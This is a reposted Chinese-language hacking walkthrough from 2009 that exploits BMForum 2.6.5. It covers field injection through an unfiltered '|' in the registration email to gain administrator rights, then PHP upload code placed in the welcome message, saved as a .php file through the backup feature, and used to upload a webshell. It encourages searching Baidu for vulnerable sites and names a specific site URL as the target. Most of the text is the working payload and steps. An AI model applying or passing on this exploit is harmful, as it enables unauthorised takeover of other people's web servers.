首页 网络安全 安全学院 查看内容

BMF-提升權限之旅

2009-2-4 09:55 732 0

摘要: 作者:ezboy    来源:www.wrsky.com主要漏洞是發生在註冊會員時,部分資料沒有過濾|這個符號!!而這個討論區會員的存檔格式為XXX|XXXX|...
关键词: 格式 备份 管理 注册 路径 nbsp test com 用户 贺岁

作者:ezboy    来源:www.wrsky.com主要漏洞是發生在註冊會員時,部分資料沒有過濾|這個符號!!而這個討論區會員的存檔格式為XXX|XXXX|XXXX|用|做為區隔的email這個欄位剛好沒被過濾到提交[email protected]|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|這樣的格式可以比照管理員的註冊格式,發現第19格為0為管理員!!!註冊完畢之後發現身分為管理員了!!------------------可以在公告裡添加木馬,然後利用論壇備份成php檔!!!....Endhnxyy[F.S.T]完善如下:受影响版本:BMForum Plus! 2.6.5 贺岁版BMForum Datium! 2.6.5 贺岁版在baidu中搜以上版本,随便选一个,进入注册用户页面:利用注册选项过滤不完整攻击。mail选项填写格式:[email protected]|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|注册一用户eztest,密码:eztest,mail格式如上登陆,点管理中心,用上面的用户和密码可以进入管理后台界面。管理页面:adminindex.php注册欢迎段信息的正文处输入;';copy($_FILES[mf][tmp_name],$_FILES[mf][name])?>论坛备份:选择备份欢迎信息文件,其它都去掉指定备份目录为:备份路径:face/222 other目录是必须的。完整路径:http://saiy.77yan.com/wrsky/face/222/other/welcome.phpphpcl.htm <form ENCTYPE="multipart/form-data" action="http://saiy.77yan.com/wrsky/face/222/other/welcome.php"; method="POST"> <input name="mf" type="file"> <input value="send" type="submit"> </form>上传马2005.php,马的路径就是:http://saiy.77yan.com/wrsky/face/222/other/2005.php
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部